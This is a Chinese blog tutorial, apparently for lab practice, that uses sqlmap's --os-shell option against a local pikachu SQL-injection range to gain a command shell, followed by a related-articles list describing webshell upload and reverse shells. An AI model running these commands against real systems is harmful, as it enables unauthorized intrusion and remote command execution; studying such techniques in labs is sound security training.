sqlmap (--os-shell)的使用

最新推荐文章于 2024-05-21 20:29:55 发布
最新推荐文章于 2024-05-21 20:29:55 发布
阅读量414 收藏 8
点赞数 7
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45815516/article/details/135324553
版权

sqlmap (–os-shell)的使用

实验前的环境准备:

  1. 搭建phpstudy环境及pikachu靶场
  2. 保证kali可以正常访问pikachu靶场

使用kali访问pikachu靶场

以字符型注入(get)为例,随便输入一些信息,点击“查询”

在这里插入图片描述

使用sqlmap注入

python sqlmap.py -u "http://192.168.1.139/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --os-shell

在这里插入图片描述

可以尝试的注入方式

在这里插入图片描述

选择语言 4

在这里插入图片描述

您是否希望sqlmap进一步尝试激发完整的路径公开 Y
输入pikachu靶场的绝对路径 2(自定义路径)在这里插入图片描述
选择路径的四个选项解析

在这里插入图片描述

成功反弹shell

在这里插入图片描述

查看权限
whoami

在这里插入图片描述

查看ip

图片转存中...(img-0whRP1Qq-1704088411824)]

芷若无尘
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap的--os-shell
m0_71300782的博客
09-06 527
一、首先对目标网站进行sqlmap扫描看看是否有sql漏洞。
sqlmap --os-shell选项原理解析
来日可期的博客
10-18 1694
sqlmap的--os-shell在mysql数据库中的原理,是往服务器上写入了两个php,其中一个提供了文件上传的页面,可以通过这个上传页面上传脚本文件到当前目录下。另外一个则是返回了可以让我们执行系统命令的命令行,命令行也可以在网页url中通过对cmd参数传参执行系统命令。
sqlmap 如何 --os-shell 及反弹shell_sqlmapshell(1)
2401_84281594的博客
05-17 646
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sqlmapos-shell的原理
mingyqf的博客
11-06 4628
0x00 Background 最近遇到测试环境,最后利用sqlmap的--os-shell参数取得shell。一直以来,对这个参数的工作原理不是十分的清晰。大致的思想应该是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令。 0x01 Environment 本环境是在局域网下利用两台主机搭建的,环境比较真实。 攻击机: 系统:windows7 工具:sqlmap 靶机: 系统:windows7 环境:wamp搭建的ap...
sqlmap 如何 --os-shell 及反弹shell
weixin_63580357的博客
10-17 894
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 3744
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
sqlmap-master
06-23
5. **利用与提权**:如果数据库允许,SQLMap可以尝试利用特定的数据库漏洞进行权限提升,比如获取数据库服务器的shell访问权限。 6. **隐秘性**:为了不被检测到,SQLMap可以设置延迟时间、随机化HTTP头等参数,...
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap的脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u ..../sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
sqlmapproject-sqlmap-0.9-3907-g9c22555
12-15
4. **权限提升**:如果目标系统存在弱权限设置,SQLMap可以尝试获取更高的数据库权限,例如通过执行系统命令(`os-shell`)或读取文件(`file-read`)。 5. **枚举与注入技术**:SQLMap支持多种注入技术,如布尔盲注、...
sqlmapproject-sqlmap-1.5-40-g4a12493.tar.gz
04-27
4. **权限升级**:利用`--os-pwn`或`--os-shell`等选项,尝试获得操作系统级别的访问权限,这在某些情况下可能可行。 5. **防御策略分析**:除了攻击,sqlmap还提供了`--tech`选项来识别目标防御策略,帮助我们了解...
第二十节 Sqlmap系统参数-01
09-15
使用--os-shell选项,Sqlmap可以执行系统命令,例如: ``` python sqlmap.py -u "注入点" --os-shell ``` 这将打开一个交互式shell,允许用户执行系统命令和控制目标系统。 二、Sqlmap结合Metasploit Sqlmap可以...
sqlmap --os-shell(写入木马获取getshell
NSQ0207的博客
09-06 1048
抓包,查看报错暴露出绝对路径。
sqlmap之--os-shell应用
weixin_50205723的博客
09-19 6508
一、找到网站注入点然后进入sqlmap进行攻击(学校靶机) sqlmap -u "http://117.167.136.244:28055/ajax.php?act=selgo" --data "tyid=1" -D faka -T ayangw_config --dump 二、输入sqlmap.py -u "http://117.167.136.244:28060/ajax.php?act=selKm" --data "gid=1" --is-dba判断是否具有数据库管理员权限 确定具有后进行下一步操作
SQLmap使用指南(包含使用SQLmap获取shell)
北冥同学的成长记录笔记
07-16 4017
Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
Sqlmap的getshell使用(--os-shell
bring_coco的博客
03-16 9080
环境:sqli-lab靶场+phpstudy。
sqlmap基础
课嗨教育的专栏
04-02 799
什么是SQLMAPSqlmap是一款由Python语言编写的开源sql注入检测、利用工具,它可以自动检测和利用sql注入漏洞,并且配备了强大的检测引擎,拥有丰富的特性这其中包括了指纹识别、对系统的控制、自动识别密码的散列格式并暴力破解等等,加之非常多的参数,是一款安全从业人员必备的工具。 其他特性: 基于数据库服务进程提权和上传执行后门 支持保存当前会话、断点续扫 支持多线程,指定最大的并发数、执行的间隔时间 支持读取BurpSuite的日志、结合google自动搜索进行sql注入检查 集
5、sqlmap注入post类型+os-shell
最新发布
weixin_51520483的博客
05-21 364
3、上bp抓取数据包,sqlmmap用post注入走一遍,找到数据库,账号密码,这里的账号密码其实也没什么用,形同虚设。5、试一下shell注入,一试一个准,直接进去了,查看一下根目录发现flag。2、判断注入类型,是一个字符注入,使用or直接绕过密码进去了。6、成功进入shell,查看根目录文件,发现flag。3、发现数据库没有机会的情况,换os-shell注入。4、老规矩,数据表、字段挨个走一遍,但没有什么发现。-r:表示目标为一个文件,bp抓的包。-p:表示一个参数,即一个注入的口。
sqlmap (os-shell)
猎荒者
03-14 5704
Dancing with your ghost 环境准备 Kali(IP:10.10.16.128) win 7(IP:10.10.16.131)使用 phpstudy 搭建 sql 注入漏洞环境 NAT 网络连接 漏洞源码 查看源码可以得知这是一个数字型 SQL 注入 漏洞利用 直接在 Kali 中打开 Firefox 浏览器,访问。(这里在 phpstudy 的设置中,将 apach...
sqlmap --os-shell
03-16
sqlmap 是一款开源的 SQL 注入工具,它可以自动...选项 --os-shell 可以让 sqlmap 尝试利用 SQL 注入漏洞来获取操作系统级别的访问权限。使用这个选项需要目标系统中存在 SQL 注入漏洞并且需要您有权限使用这个工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值